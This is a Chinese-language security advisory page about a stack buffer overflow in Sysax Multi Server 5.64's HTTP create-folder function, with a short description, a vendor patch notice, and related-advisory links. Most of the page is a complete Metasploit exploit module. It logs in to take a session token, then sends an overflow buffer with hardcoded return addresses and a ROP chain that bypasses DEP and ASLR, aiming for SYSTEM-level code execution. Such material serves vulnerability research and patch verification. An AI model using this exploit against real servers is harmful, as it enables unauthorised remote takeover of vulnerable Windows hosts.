Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Sysax Multi Server函数缓冲区溢出漏洞

发布日期:2012-07-29
更新日期:2012-07-31受影响系统:
sysax Sysax Multi Server 5.64
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54713Sysax Multi Server是windows平台下的SSH2和FTP服务器。Sysax Multi Server 5.64及之前版本在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞以提升的权限执行任意代码。<*来源:Matt Andreko
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Matt Andreko ()提供了如下测试方法:
require "msf/core"
require "base64"class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking    include Msf::Exploit::Remote::HttpClient    def initialize(info = {})
        super(update_info(info,
            "Name"      => "Sysax Multi Server 5.64 Create Folder BoF",
            "Description"   => %q{
                    This module exploits a stack buffer overflow in the create folder function
                    in Sysax Multi Server 5.64. This issue was fixed in 5.66.                    You must have valid credentials to trigger the vulnerability. Your credentials
                    must also have the create folder permission and the HTTP option has to be enabled.
                    This module will log into the server, get your a SID token and then proceed to exploit
                    the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
                    XP SP3, and Server 2003 SP1-SP2.
            },
            "License"   => MSF_LICENSE,
            "Author"    =>
                [
                    "Matt Andreko @mandreko", # discovery & Metasploit module for 5.64
                    "Craig Freyman @cd1zz", # original discovery & Metasploit module for 5.50
                ],
            "Version"   => "$Revision:$",
            "References"    =>
                [
                    [ "URL", "http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html" ], # 5.64 update
                    [ "URL", "http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html" ], # 5.50 post
                ],
            "DefaultOptions" =>
                {
                    "EXITFUNC" => "process",
                },
            "Platform"  => "win",
            "Payload"   =>
                {
                    "BadChars" => "x00x2F",
                },            "Targets"       =>
                [
                    [ "Windows XP SP3",
                        {
                            "Rop"       =>   false,
                            "Ret"       =>   0x77c35459, # push esp #  ret [sysaxd.exe]
                            "Offset"    =>   701,
                        }
                    ],
                    [ "Windows 2003 SP1-SP2 DEP & ASLR Bypass",
                        {
                            "Rop"       =>   true,
                            "Ret"       =>   0x77baf605, # pivot
                            "Offset"    =>   701,
                            "Nop"       =>   0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
                        }
                    ],
                ],
            "Privileged"    => false,
            "DisclosureDate"=> "July 29, 2012",
            "DefaultTarget" => 0))        register_options(
                [
                    OptString.new("URI", [false, "URI for Multi Server", "/"]),
                    Opt::RPORT(80),
                    OptString.new("SysaxUSER", [ true, "Username" ]),
                    OptString.new("SysaxPASS", [ true, "Password" ])
                ], self.class)
        
    end    def target_url
        "http://#{rhost}:#{rport}#{datastore["URI"]}"
    end    def create_rop_chain()
        rop_gadgets = []
        # All rop gadgets generated by mona.py
        # Thanks corelanc0d3r for making such a great tool        if (target == targets[1]) # Windows 2003
            rop_gadgets =
            [
                0x77be3adb, # POP EAX # RETN [msvcrt.dll]
                0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
                0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
                0x41414141, # Filler (compensate)
                0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
                0x77bdb896, # POP EBP # RETN [msvcrt.dll]
                0x77be2265, # & push esp #  ret  [msvcrt.dll]
                0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
                0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
                0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
                0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
                0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
                0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
                0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
                0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
                0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
                0x77befbb4, # &Writable location [msvcrt.dll]
                0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
                0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
                0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
                0x90909090, # nop
                0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
            ].flatten.pack("V*")
        end        return rop_gadgets    end    def exploit
        
        user = datastore["SysaxUSER"]
        pass = datastore["SysaxPASS"]
        
        #base64 encode the credentials
        encodedcreds = Base64.encode64(user+"x0a"+pass)
        creds = "fd="+encodedcreds        connect        # Login to get SID value
        print_status "Getting SID from #{target_url}"
        res = send_request_raw({
            "method"=> "POST",
            "uri"   => "#{target_url}/scgi?sid=0&pid=dologin",
            "data"  => creds
        },20)
        
        #parse response for SID token
        sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
        print_status "Your " + sid.to_s        buffer = rand_text(target["Offset"])
        buffer << [target.ret].pack("V")        if (target["Rop"])
            buffer << [target["Nop"]].pack("V")*16
            buffer << create_rop_chain()
        end        buffer << make_nops(15)
        buffer << payload.encoded #max 1299 bytes
        
        #pwnag3 post data
        post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1 "
        post_data << "Content-Length: 171 "
        post_data << "-----------------------------1190753071675116720811342231 "
        post_data << "Content-Disposition: form-data; name="e2" "
        post_data << buffer+" "
        post_data << "-----------------------------1190753071675116720811342231-- "
        
        referer = "http://"+datastore["RHOST"].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
                
        send_request_raw({
            "uri"     => "/" + post_data,
            "version" => "1.1",
            "method"  => "POST",
            "referer" => referer
        })        handler
        disconnect    end
end建议:
--------------------------------------------------------------------------------
厂商补丁:sysax
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.sysax.com/Ubisoft Entertainment UPLAY "OBJECT"控件远程命令执行漏洞httpdx堆缓冲区溢出漏洞相关资讯      Sysax Multi Server  缓冲区溢出漏洞 
  • Novell iPrint Client 缓冲区溢出  (05/04/2013 07:13:08)
  • Siemens WinCC CCEServer缓冲区溢  (03/22/2013 19:25:09)
  • EMC AlphaStor DCP缓冲区溢出漏洞  (02/05/2013 09:14:34)
  • Siemens WinCC RegReader ActiveX  (03/24/2013 08:07:04)
  • Novell Messenger / Groupwise   (03/18/2013 20:58:20)
  • GNU Coreutils ‘sort’Text   (02/02/2013 07:27:30)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图